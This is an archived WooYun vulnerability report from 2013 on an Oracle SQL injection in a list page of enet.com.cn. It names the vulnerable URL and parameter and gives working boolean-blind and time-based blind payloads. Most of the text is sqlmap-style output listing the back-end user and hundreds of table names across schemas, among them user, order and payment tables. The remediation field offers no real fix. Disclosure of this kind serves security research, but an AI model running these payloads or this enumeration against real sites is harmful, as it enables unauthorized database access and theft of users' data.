当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-043975

漏洞标题:硅谷动力oracle注入漏洞

相关厂商:enet.com.cn

漏洞作者: adm1n

提交时间:2013-11-27 08:23

修复时间:2013-12-02 08:24

公开时间:2013-12-02 08:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-27: 细节已通知厂商并且等待厂商处理中
2013-12-02: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

硅谷动力oracle注入漏洞,大量数据泄露

详细说明:

1.http://happy.enet.com.cn/php/list.php?cid=106

漏洞证明:

Place: GET
Parameter: cid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cid=106 AND 6433=6433
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: cid=106 AND 6245=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(85)||CHR(90
)||CHR(122),5)
---
[20:59:17] [INFO] the back-end DBMS is Oracle
web application technology: Apache 2.0.54, PHP 5.3.6
back-end DBMS: Oracle
current user: 'EWARE_ADMIN'
Database: SYS
[329 tables]
+-------------------------------+
| DUAL |
| ACCESS$ |
| APPLY$_CONF_HDLR_COLUMNS |
| APPLY$_DEST_OBJ |
| APPLY$_DEST_OBJ_CMAP |
| APPLY$_DEST_OBJ_OPS |
| APPLY$_ERROR |
| APPLY$_ERROR_HANDLER |
| APPLY$_SOURCE_OBJ |
| APPLY$_SOURCE_SCHEMA |
| APPROLE$ |
| AQ$_MESSAGE_TYPES |
| AQ$_PENDING_MESSAGES |
| AQ$_PROPAGATION_STATUS |
| AQ$_PUBLISHER |
| AQ$_QUEUE_STATISTICS |
| AQ$_QUEUE_TABLE_AFFINITIES |
| AQ$_REPLAY_INFO |
| AQ$_SCHEDULES |
| AQ_EVENT_TABLE |
| AQ_SRVNTFN_TABLE |
| ARGUMENT$ |
| ASSOCIATION$ |
| ATEMPTAB$ |
| ATTRCOL$ |
| ATTRIBUTE$ |
| ATTRIBUTE_TRANSFORMATIONS$ |
| AUD$ |
| AUDIT$ |
| AUDIT_ACTIONS |
| AUX_STATS$ |
| AW$ |
| BOOTSTRAP$ |
| CCOL$ |
| CDC_CHANGE_COLUMNS$ |
| CDC_CHANGE_SETS$ |
| CDC_CHANGE_SOURCES$ |
| CDC_CHANGE_TABLES$ |
| CDC_SUBSCRIBED_COLUMNS$ |
| CDC_SUBSCRIBED_TABLES$ |
| CDC_SUBSCRIBERS$ |
| CDC_SYSTEM$ |
| CDEF$ |
| CLU$ |
| COL$ |
| COLLECTION$ |
| COLTYPE$ |
| COL_USAGE$ |
| COM$ |
| CON$ |
| CONTEXT$ |
| DBMS_ALERT_INFO |
| DBMS_LOCK_ALLOCATED |
| DEFROLE$ |
| DEFSUBPART$ |
| DEFSUBPARTLOB$ |
| DEPENDENCY$ |
| DIM$ |
| DIMATTR$ |
| DIMJOINKEY$ |
| DIMLEVEL$ |
| DIMLEVELKEY$ |
| DIR$ |
| DUC$ |
| ERROR$ |
| EXPACT$ |
| EXPDEPACT$ |
| EXPDEPOBJ$ |
| EXPPKGACT$ |
| EXPPKGOBJ$ |
| EXTERNAL_LOCATION$ |
| EXTERNAL_TAB$ |
| FET$ |
| FGA$ |
| FGA_LOG$ |
| FILE$ |
| HIER$ |
| HIERLEVEL$ |
| HISTGRM$ |
| HIST_HEAD$ |
| HS$_BASE_CAPS |
| HS$_BASE_DD |
| HS$_CLASS_CAPS |
| HS$_CLASS_DD |
| HS$_CLASS_INIT |
| HS$_FDS_CLASS |
| HS$_FDS_CLASS_DATE |
| HS$_FDS_INST |
| HS$_INST_CAPS |
| HS$_INST_DD |
| HS$_INST_INIT |
| ICOL$ |
| ICOLDEP$ |
| IDL_CHAR$ |
| IDL_SB4$ |
| IDL_UB1$ |
| IDL_UB2$ |
| ID_GENS$ |
| INCEXP |
| INCFIL |
| INCVID |
| IND$ |
| INDCOMPART$ |
| INDOP$ |
| INDPART$ |
| INDPART_PARAM$ |
| INDSUBPART$ |
| INDTYPES$ |
| JAVA$JVM$STATUS |
| JAVA$JVM$STEPS$DONE |
| JAVA$RMJVM$AUX |
| JAVA$RMJVM$AUX2 |
| JAVA$RMJVM$AUX3 |
| JAVASNM$ |
| JIJOIN$ |
| JIREFRESHSQL$ |
| JOB$ |
| KOPM$ |
| LIBRARY$ |
| LINK$ |
| LOB$ |
| LOBCOMPPART$ |
| LOBFRAG$ |
| LOC$ |
| LOG$ |
| LOGMNRG_ATTRCOL$ |
| LOGMNRG_ATTRIBUTE$ |
| LOGMNRG_CCOL$ |
| LOGMNRG_CDEF$ |
| LOGMNRG_COL$ |
| LOGMNRG_COLTYPE$ |
| LOGMNRG_DICTIONARY$ |
| LOGMNRG_ICOL$ |
| LOGMNRG_IND$ |
| LOGMNRG_INDCOMPART$ |
| LOGMNRG_INDPART$ |
| LOGMNRG_INDSUBPART$ |
| LOGMNRG_LOB$ |
| LOGMNRG_LOBFRAG$ |
| LOGMNRG_OBJ$ |
| LOGMNRG_SEED$ |
| LOGMNRG_TAB$ |
| LOGMNRG_TABCOMPART$ |
| LOGMNRG_TABPART$ |
| LOGMNRG_TABSUBPART$ |
| LOGMNRG_TS$ |
| LOGMNRG_TYPE$ |
| LOGMNRG_USER$ |
| LOGMNRT_ATTRCOL$ |
| LOGMNRT_ATTRIBUTE$ |
| LOGMNRT_CCOL$ |
| LOGMNRT_CDEF$ |
| LOGMNRT_COL$ |
| LOGMNRT_COLTYPE$ |
| LOGMNRT_DICTIONARY$ |
| LOGMNRT_ICOL$ |
| LOGMNRT_IND$ |
| LOGMNRT_INDCOMPART$ |
| LOGMNRT_INDPART$ |
| LOGMNRT_INDSUBPART$ |
| LOGMNRT_LOB$ |
| LOGMNRT_LOBFRAG$ |
| LOGMNRT_OBJ$ |
| LOGMNRT_SEED$ |
| LOGMNRT_TAB$ |
| LOGMNRT_TABCOMPART$ |
| LOGMNRT_TABPART$ |
| LOGMNRT_TABSUBPART$ |
| LOGMNRT_TS$ |
| LOGMNRT_TYPE$ |
| LOGMNRT_USER$ |
| LOGMNR_BUILDLOG |
| LOGMNR_INTERESTING_COLS |
| MAP_COMPLIST$ |
| MAP_ELEMENT$ |
| MAP_EXTELEMENT$ |
| MAP_FILE$ |
| MAP_FILE_EXTENT$ |
| MAP_OBJECT |
| MAP_SUBELEMENT$ |
| METAFILTER$ |
| METASTYLESHEET |
| METAVIEW$ |
| METAXSL$ |
| METAXSLPARAM$ |
| METHOD$ |
| MIGRATE$ |
| MLOG$ |
| MLOG_REFCOL$ |
| MON_MODS$ |
| NOEXP$ |
| NTAB$ |
| OBJ$ |
| OBJAUTH$ |
| OBJECT_USAGE |
| OBJPRIV$ |
| ODCI_SECOBJ$ |
| ODCI_WARNINGS$ |
| OID$ |
| OPANCILLARY$ |
| OPARG$ |
| OPBINDING$ |
| OPERATOR$ |
| OPQTYPE$ |
| PARAMETER$ |
| PARTCOL$ |
| PARTLOB$ |
| PARTOBJ$ |
| PENDING_SESSIONS$ |
| PENDING_SUB_SESSIONS$ |
| PENDING_TRANS$ |
| PROCEDURE$ |
| PROCEDUREC$ |
| PROCEDUREINFO$ |
| PROCEDUREJAVA$ |
| PROFILE$ |
| PROFNAME$ |
| PROPS$ |
| PROXY_DATA$ |
| PROXY_ROLE_DATA$ |
| PRVT_EPGCTAB_ADMIN |
| PRVT_EPGCTAB_DAD |
| PRVT_EPGCTAB_DAD_ATTRS |
| PRVT_EPGCTAB_GLOBALS |
| PRVT_EPGCTAB_PORTS |
| PS$ |
| PSTUBTBL |
| REC_TAB$ |
| REC_VAR$ |
| REFCON$ |
| REG$ |
| REGISTRY$ |
| REG_SNAP$ |
| RESOURCE_CONSUMER_GROUP$ |
| RESOURCE_COST$ |
| RESOURCE_MAP |
| RESOURCE_PLAN$ |
| RESOURCE_PLAN_DIRECTIVE$ |
| RESULT$ |
| RGCHILD$ |
| RGROUP$ |
| RLS$ |
| RLS_CTX$ |
| RLS_GRP$ |
| RULE$ |
| RULESET$ |
| RULE_EC$ |
| RULE_MAP$ |
| RULE_SET$ |
| SECOBJ$ |
| SEG$ |
| SEQ$ |
| SETTINGS$ |
| SLOG$ |
| SMON_SCN_TIME |
| SNAP$ |
| SNAP_COLMAP$ |
| SNAP_LOADERTIME$ |
| SNAP_LOGDEP$ |
| SNAP_OBJCOL$ |
| SNAP_REFOP$ |
| SNAP_REFTIME$ |
| SNAP_SITE$ |
| SOURCE$ |
| SQL_VERSION$ |
| STMT_AUDIT_OPTION_MAP |
| STREAMS$_APPLY_MILESTONE |
| STREAMS$_APPLY_PROCESS |
| STREAMS$_APPLY_PROGRESS |
| STREAMS$_CAPTURE_PROCESS |
| STREAMS$_DEF_PROC |
| STREAMS$_KEY_COLUMNS |
| STREAMS$_PREPARE_DDL |
| STREAMS$_PREPARE_OBJECT |
| STREAMS$_PROCESS_PARAMS |
| STREAMS$_PROPAGATION_PROCESS |
| STREAMS$_RULES |
| SUBCOLTYPE$ |
| SUBPARTCOL$ |
| SUM$ |
| SUMAGG$ |
| SUMDELTA$ |
| SUMDEP$ |
| SUMDETAIL$ |
| SUMINLINE$ |
| SUMJOIN$ |
| SUMKEY$ |
| SUMPARTLOG$ |
| SUMPRED$ |
| SUPEROBJ$ |
| SYN$ |
| SYSAUTH$ |
| SYSTEM_PRIVILEGE_MAP |
| TAB$ |
| TABCOMPART$ |
| TABLE_PRIVILEGE_MAP |
| TABPART$ |
| TABSUBPART$ |
| TRANSFORMATIONS$ |
| TRIGGER$ |
| TRIGGERCOL$ |
| TRIGGERJAVAC$ |
| TRIGGERJAVAF$ |
| TRIGGERJAVAM$ |
| TRIGGERJAVAS$ |
| TRUSTED_LIST$ |
| TS$ |
| TSQ$ |
| TYPE$ |
| TYPED_VIEW$ |
| TYPEHIERARCHY$ |
| TYPE_MISC$ |
| UET$ |
| UGROUP$ |
| UNDO$ |
| USER$ |
| USER_ASTATUS_MAP |
| USER_HISTORY$ |
| USTATS$ |
| UTL_RECOMP_BACKUP_JOBS |
| UTL_RECOMP_COMPILED |
| UTL_RECOMP_INVALID |
| UTL_RECOMP_LOG |
| UTL_RECOMP_SORTED |
| VIEW$ |
| VIEWCON$ |
| VIEWTRCOL$ |
| VTABLE$ |
| _DEFAULT_AUDITING_OPTIONS_ |
+-------------------------------+
Database: OUTLN
[3 tables]
+-------------------------------+
| OL$ |
| OL$HINTS |
| OL$NODES |
+-------------------------------+
Database: SYSTEM
[128 tables]
+-------------------------------+
| AQ$_INTERNET_AGENTS |
| AQ$_INTERNET_AGENT_PRIVS |
| AQ$_QUEUES |
| AQ$_QUEUE_TABLES |
| AQ$_SCHEDULES |
| DEF$_AQCALL |
| DEF$_AQERROR |
| DEF$_CALLDEST |
| DEF$_DEFAULTDEST |
| DEF$_DESTINATION |
| DEF$_ERROR |
| DEF$_LOB |
| DEF$_ORIGIN |
| DEF$_PROPAGATOR |
| DEF$_PUSHED_TRANSACTIONS |
| DEF$_TEMP$LOB |
| HELP |
| LOGMNRC_DBNAME_UID_MAP |
| LOGMNRC_GSII |
| LOGMNRC_GTCS |
| LOGMNRC_GTLO |
| LOGMNR_AGE_SPILL$ |
| LOGMNR_ATTRCOL$ |
| LOGMNR_ATTRIBUTE$ |
| LOGMNR_CCOL$ |
| LOGMNR_CDEF$ |
| LOGMNR_COL$ |
| LOGMNR_COLTYPE$ |
| LOGMNR_DICTIONARY$ |
| LOGMNR_DICTSTATE$ |
| LOGMNR_HEADER1$ |
| LOGMNR_HEADER2$ |
| LOGMNR_ICOL$ |
| LOGMNR_IND$ |
| LOGMNR_INDCOMPART$ |
| LOGMNR_INDPART$ |
| LOGMNR_INDSUBPART$ |
| LOGMNR_LOB$ |
| LOGMNR_LOBFRAG$ |
| LOGMNR_LOG$ |
| LOGMNR_OBJ$ |
| LOGMNR_PROCESSED_LOG$ |
| LOGMNR_RESTART_CKPT$ |
| LOGMNR_RESTART_CKPT_TXINFO$ |
| LOGMNR_SESSION$ |
| LOGMNR_SPILL$ |
| LOGMNR_TAB$ |
| LOGMNR_TABCOMPART$ |
| LOGMNR_TABPART$ |
| LOGMNR_TABSUBPART$ |
| LOGMNR_TS$ |
| LOGMNR_TYPE$ |
| LOGMNR_UID$ |
| LOGMNR_USER$ |
| LOGSTDBY$APPLY_MILESTONE |
| LOGSTDBY$APPLY_PROGRESS |
| LOGSTDBY$EVENTS |
| LOGSTDBY$PARAMETERS |
| LOGSTDBY$PLSQL |
| LOGSTDBY$SCN |
| LOGSTDBY$SKIP |
| LOGSTDBY$SKIP_SUPPORT |
| LOGSTDBY$SKIP_TRANSACTION |
| MVIEW$_ADV_AJG |
| MVIEW$_ADV_BASETABLE |
| MVIEW$_ADV_CLIQUE |
| MVIEW$_ADV_ELIGIBLE |
| MVIEW$_ADV_EXCEPTIONS |
| MVIEW$_ADV_FILTER |
| MVIEW$_ADV_FILTERINSTANCE |
| MVIEW$_ADV_FJG |
| MVIEW$_ADV_GC |
| MVIEW$_ADV_INFO |
| MVIEW$_ADV_JOURNAL |
| MVIEW$_ADV_LEVEL |
| MVIEW$_ADV_LOG |
| MVIEW$_ADV_OUTPUT |
| MVIEW$_ADV_PARAMETERS |
| MVIEW$_ADV_PLAN |
| MVIEW$_ADV_PRETTY |
| MVIEW$_ADV_ROLLUP |
| MVIEW$_ADV_SQLDEPEND |
| MVIEW$_ADV_TEMP |
| MVIEW$_ADV_WORKLOAD |
| REPCAT$_AUDIT_ATTRIBUTE |
| REPCAT$_AUDIT_COLUMN |
| REPCAT$_COLUMN_GROUP |
| REPCAT$_CONFLICT |
| REPCAT$_DDL |
| REPCAT$_EXCEPTIONS |
| REPCAT$_EXTENSION |
| REPCAT$_FLAVORS |
| REPCAT$_FLAVOR_OBJECTS |
| REPCAT$_GENERATED |
| REPCAT$_GROUPED_COLUMN |
| REPCAT$_INSTANTIATION_DDL |
| REPCAT$_KEY_COLUMNS |
| REPCAT$_OBJECT_PARMS |
| REPCAT$_OBJECT_TYPES |
| REPCAT$_PARAMETER_COLUMN |
| REPCAT$_PRIORITY |
| REPCAT$_PRIORITY_GROUP |
| REPCAT$_REFRESH_TEMPLATES |
| REPCAT$_REPCAT |
| REPCAT$_REPCATLOG |
| REPCAT$_REPCOLUMN |
| REPCAT$_REPGROUP_PRIVS |
| REPCAT$_REPOBJECT |
| REPCAT$_REPPROP |
| REPCAT$_REPSCHEMA |
| REPCAT$_RESOLUTION |
| REPCAT$_RESOLUTION_METHOD |
| REPCAT$_RESOLUTION_STATISTICS |
| REPCAT$_RESOL_STATS_CONTROL |
| REPCAT$_RUNTIME_PARMS |
| REPCAT$_SITES_NEW |
| REPCAT$_SITE_OBJECTS |
| REPCAT$_SNAPGROUP |
| REPCAT$_TEMPLATE_OBJECTS |
| REPCAT$_TEMPLATE_PARMS |
| REPCAT$_TEMPLATE_REFGROUPS |
| REPCAT$_TEMPLATE_SITES |
| REPCAT$_TEMPLATE_STATUS |
| REPCAT$_TEMPLATE_TARGETS |
| REPCAT$_TEMPLATE_TYPES |
| REPCAT$_USER_AUTHORIZATIONS |
| REPCAT$_USER_PARM_VALUES |
| SQLPLUS_PRODUCT_PROFILE |
+-------------------------------+
Database: YADOOR_BBS
[30 tables]
+-------------------------------+
| ANALYSE |
| BYEMESSAGE |
| COMMANT |
| CONSIGE |
| EDITOR |
| EDITOR_BAK |
| FILTERWORD |
| FORUM |
| FORUMFAVORITE |
| FORUMLOG |
| FORUMPROP |
| FORUMTYPE |
| IMAGE |
| MESSAGE |
| MESSAGEDOCUMENT |
| MESSAGEDOCUMENTBG |
| MESSAGEPROP |
| MESSAGEVOTE |
| PASS |
| PLAN_TABLE |
| SCOREMESSAGEFILTER |
| SORT |
| SUCCESS |
| THREAD |
| TOPFORUMS |
| TRASH |
| USERINFO_BBS |
| USERLEVEL |
| USERPROP |
| UTABLE |
+-------------------------------+
Database: YADOOR
[47 tables]
+-------------------------------+
| AGENTINFO |
| ARTICLE |
| BANK |
| CATEGORY |
| COLUMNS |
| COMPONENT_XSL |
| COVER |
| ENETCOMPONENT |
| ENETPOST |
| FADBACK |
| FRESH_LOG |
| HITCOUNT |
| HT_ARTICLE |
| HT_ARTICLE_TMP |
| HT_CLASSINFO |
| MERCHANDISECONTENT |
| MERCHANDISEINFO |
| MYDOR_ITEM |
| NAVBAR |
| ORDERSEQ |
| PLAN_TABLE |
| PRODCATEGORYASSIGN |
| PRODUCTRULES |
| PUBLISH_CONTENT |
| RELATIVEPRODUCTS |
| SCORE |
| STOREATTRIBUTE |
| STORECATALOG |
| STORECATEGORY |
| STORECOMPONENT |
| STOREINFO |
| STOREKEEPER |
| STORENAV |
| STOREORDERS |
| STOREPUBLISH |
| STOREPUBLISH_0822 |
| STOREPUBLISH_TMP |
| STORETEMPLATE |
| STORETYPE |
| STORETYPE_STORE |
| STORE_NAV |
| TEMPLATE |
| USERINFO |
| VOTE |
| VOTE_AWARD |
| VOTE_RESULT |
| YID2WID |
+-------------------------------+
Database: EWARE_ADMIN
[63 tables]
+-------------------------------+
| ADS_SPEED |
| AUTHOR |
| AUTHOR_SOFTINFO |
| BASICINFO |
| BASICINFO1 |
| BASICINFOBAK |
| BLACKLIST |
| CATAGORY |
| CS_BASICINFO |
| CS_DOWNLOAD |
| CS_DOWNLOAD_STAT |
| CUSTOMER |
| DBAK |
| DDOC |
| DDOC2 |
| DDSF |
| DOWNLOAD |
| DOWNLOAD1 |
| DOWNLOAD_STATISTIC |
| DOWNLOAD_STATISTIC1 |
| DOWNLOAD_STATISTICXXXX |
| DOWNLOAD_STATISTIC_BAK |
| ENT_ARTICLE |
| ENT_BASICINFO |
| ENT_BASICINFO_SEX |
| ENT_CATEGORY |
| ENT_IMGGROUP |
| ENT_JZ_BASICINFO |
| ENT_STATISTIC |
| ENT_ZHUANTI |
| ENT_ZHUANTI_ASSIGN |
| ENT_ZHUANTI_SEX |
| ESOFTSERVER |
| FONTINFO |
| JJHTEST |
| JZ_USERINFO |
| ORDERPROCINFO |
| ORDERS |
| ORDERSTATS |
| PAYMENTMETHOD |
| PLAN_TABLE |
| PLATFORM |
| REFRESH_HISTORY |
| REGSTATUS |
| SF_TMP |
| SF_TMP11 |
| SOFTWAREDEALINFO |
| SOFTWAREREGINFO |
| SUBCATAGORY |
| TBL_REGION |
| T_HISTORYTRAN |
| USERM_BASIC_MOBILE |
| V1_BASICINFO |
| V1_BASICINFO_081113 |
| V1_BASICINFO_BAK |
| V1_BASICINFO_BAK0904 |
| V1_BASICINFO_OLD |
| V1_RELATIVE |
| VIDEO_BASE |
| VIDEO_CHAPTER |
| VIDEO_NODE |
| VIDEO_OLDZHUANTI |
| VIDEO_ZHUANTI |
+-------------------------------+
Database: ESHOP_ADMIN
[131 tables]
+-------------------------------+
| CONDITION |
| ACTIVE_PLOY |
| ACTIVE_PRODUCT |
| ACTIVE_STATUS |
| ACTIVE_WIN |
| AGENTINFO |
| ARTICLE |
| ARTICLEATTRIBUTE |
| ARTICLECATEGORYASSIGN |
| ARTICLECOLUMNASSIGN |
| ASSIGNARTICLE |
| BALANCE |
| BANKORDER |
| CATEGORY |
| CODTABLE |
| COLUMNS |
| COMPONENT_XSL |
| CONTENT |
| COVER |
| COVER_BAK |
| DAYPAGEVIEW |
| DELIVERYADDRESS |
| DELIVERYMETHOD |
| DELIVERYSYSTEM |
| DISCOUNT_TICKET |
| DOMAININFO |
| EFALAVOTE |
| ENETCOMPONENT |
| ENETLAYOUT |
| ENGIN |
| ESHOP_STOREINFO |
| EXPRESS |
| FADBACK |
| FAVORITE |
| GMCONTRIBUTE |
| GMIMAGE |
| GROUPRIGHT |
| GROUPS |
| HGCATEGORY |
| HGCATEGORY0710 |
| INCOME |
| INCOMELOG |
| LOGISTIC |
| MAILINFO |
| MANAGEINFO |
| MERCHANDISEATTRIBUTE |
| MERCHANDISECONTENT |
| MERCHANDISEINFO |
| MONTHPAGEVIEW |
| MONTHVISIT |
| MYDORUSER |
| MYDOR_CATEGORY |
| MYDOR_FAVORITE |
| MYDOR_MAIL |
| MYDOR_NEWS |
| MYDOR_USUALLY |
| NAVBAK62 |
| NAVBAR |
| ORDERADDRESS |
| ORDERINFO |
| ORDERLOG |
| ORDERPRODUCTS |
| ORDERSEQ |
| PAGEVIEW |
| PART_FAVORITE |
| PAYMENTMETHOD |
| PLAN_TABLE |
| PRODCATEGORYASSIGN |
| PRODUCTCATEGORY |
| PRODUCTCOUNT |
| PRODUCTRULES |
| PUBLISHCATEGORYASSIGN |
| PUBLISH_CONTENT |
| RELATIVEARTICLE |
| RELATIVEPRODUCTS |
| RESULT |
| SEARCHENGIN |
| SERVICEINFO |
| SERVICEPRODUCTS |
| SETTLEONEACCOUNT |
| SORT |
| STOREATTRIBUTE |
| STORECATALOG |
| STORECATEGORY |
| STORECOMPONENT |
| STOREINFO |
| STORELOGISTIC |
| STORENAV |
| STOREPUBLISH |
| STOREPUBLISH_BAK |
| STORERULES |
| STORETEMPLATE |
| STORETYPE |
| STORETYPE_STORE |
| STOREUSERINFO |
| STOREUSERMARK |
| STORE_DS_ASSIGN |
| STORE_NAV |
| STORE_PM_ASSIGN |
| STORE_VIP |
| STUDENT |
| STUDENT1 |
| SUBSCRIBE |
| TECHCATEGORY |
| TECHINFO |
| TEMP |
| TEMPL |
| TEMPLATE |
| TEMPLATE_BAK |
| USERGROUP |
| USERINFO |
| USERINFOBAK |
| USER_FAVORITE |
| USER_MAIL |
| USER_NEWS |
| USER_PAYMENT |
| USER_USUALLY |
| USUBSCRIBE |
| UVOTE |
| VOPTIONS |
| WENZHANG |
| YEARPAGEVIEW |
| YEARVISIT |
| YPE |
| YPI |
| YPP |
| YPP0710 |
| YPP0718 |
| YPP0811 |
| YPPCOUNT |
| YP_USER |
+-------------------------------+
Database: UN
[11 tables]
+-------------------------------+
| LIANTONGQUHAOBIAO |
| PLAN_TABLE |
| UN_PRODUCTASSIGN |
| UN_PRODUCTSFEE |
| UN_REQUESTLOG |
| UN_REQUESTLOG_BAK_20051102 |
| UN_REQUESTLOG_BAK_20051201 |
| UN_RESPONSELOG |
| UN_SPUSER |
| UN_STATISTIC |
| UN_WEBUSER |
+-------------------------------+
Database: WMSYS
[22 tables]
+-------------------------------+
| WM$ADT_FUNC_TABLE |
| WM$ENV_VARS |
| WM$INSTEADOF_TRIGS_TABLE |
| WM$LOCKROWS_INFO |
| WM$MODIFIED_TABLES |
| WM$MW_TABLE |
| WM$NESTED_COLUMNS_TABLE |
| WM$NEXTVER_TABLE |
| WM$REPLICATION_TABLE |
| WM$RESOLVE_WORKSPACES_TABLE |
| WM$RIC_TABLE |
| WM$RIC_TRIGGERS_TABLE |
| WM$TMP_DBA_CONSTRAINTS |
| WM$UDTRIG_DISPATCH_PROCS |
| WM$UDTRIG_INFO |
| WM$VERSIONED_TABLES |
| WM$VERSION_HIERARCHY_TABLE |
| WM$VERSION_TABLE |
| WM$VT_ERRORS_TABLE |
| WM$WORKSPACES_TABLE |
| WM$WORKSPACE_PRIV_TABLE |
| WM$WORKSPACE_SAVEPOINTS_TABLE |
+-------------------------------+
Database: YADOOR_ADMIN
[78 tables]
+-------------------------------+
| ADDRESLIST |
| ALARM |
| ALARMEQUIP |
| ANALYSE |
| ARTICLECONTENT |
| ARTICLE_COUNT |
| BUYEQUIP |
| BYEMESSAGE |
| COMMANT |
| CONSIGE |
| DAILY |
| EDITOR |
| EDITOR_TEST |
| ENETIP |
| ENETPOST |
| EXPERT |
| FILTERWORD |
| FORUM |
| FORUMFAVORITE |
| FORUMLOG |
| FORUMPROP |
| FORUMTYPE |
| GAMEEQUIP |
| GAME_COUNT |
| LEFTWORD |
| LOTTERY |
| MESSAGE |
| MESSAGECOMMEND |
| MESSAGEPROP |
| MESSAGEVOTE |
| MM |
| MYDORALBUM |
| MYDORAPPLY |
| MYDORARTICLE |
| MYDORBANK |
| MYDORFRIEND |
| MYDORNAV |
| MYDORPHOTO |
| MYDORRESOURCE |
| MYDORSCORE |
| MYDORUSER |
| MYDORUSERBAK |
| MYDORUSERNAV |
| MYDORUSERNAV0312 |
| MYDORUSER_MORE |
| MYDOR_CATEGORY |
| MYDOR_DIARY |
| MYDOR_FAVORITE |
| MYDOR_ITEM |
| MYDOR_MAIL |
| MYDOR_NEWS |
| MYDOR_NEWS_917 |
| MYDOR_PERSONALPIC |
| MYDOR_SHOPKEEPER |
| MYDOR_USUALLY |
| NEWS |
| ORDERS |
| ORDERSEQ |
| PART_FAVORITE |
| PASS |
| PHOTO_COUNT |
| PLAN_TABLE |
| PRIZE |
| SCOREMESSAGEFILTER |
| SORT |
| SUCCESS |
| THREAD |
| TRASH |
| URLLOG |
| USERINFO_BBS |
| USERLEVEL |
| USERPROP |
| USER_FAVORITE |
| USER_MAIL |
| USER_NEWS |
| USER_USUALLY |
| WISDOM |
| YID2WID |
+-------------------------------+
Database: IFLOW_ENEWS
[38 tables]
+-------------------------------+
| ANSWERS |
| ARTICLE |
| ARTICLEPRODUCT |
| ARTICLESOFTASSIGN |
| ARTICLE_USER |
| CATEGORY |
| CATEGORYARTICLEASSIGN |
| CIO_MAP |
| CIWEEKLYCOMMENT |
| CIWEEKLY_PEOPLE100_USERS |
| CIWEEKLY_WEB100 |
| CIWEEKLY_WEB100_USERIP |
| CONTENT_USER |
| HARDWARE_COMMENT |
| HITBAK |
| HITCOUNT |
| MLOG$_ARTICLE |
| MLOG$_ARTICLEPRODUCT |
| MLOG$_CATEGORY |
| MLOG$_CATEGORYARTICLEASSIG |
| MOBILE_COMMENT |
| MOBILE_INQUIRY |
| MOBILE_INQUIRY_ANSWER |
| MOBILE_INQUIRY_COMMENT |
| MOBILE_INQUIRY_GROUP |
| MOBILE_INQUIRY_USERINFO |
| NAMETOURL |
| PLAN_TABLE |
| PUBSEQ |
| REFRESH_HISTORY |
| RUPD$_ARTICLE |
| RUPD$_ARTICLEPRODUCT |
| RUPD$_CATEGORY |
| RUPD$_CATEGORYARTICLEASSIG |
| SITE |
| TEMPLATE |
| USERLEVEL |
| USERS |
+-------------------------------+

修复方案:

看着办吧~

版权声明:转载请注明来源 adm1n@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-12-02 08:24

厂商回复:

最新状态:

暂无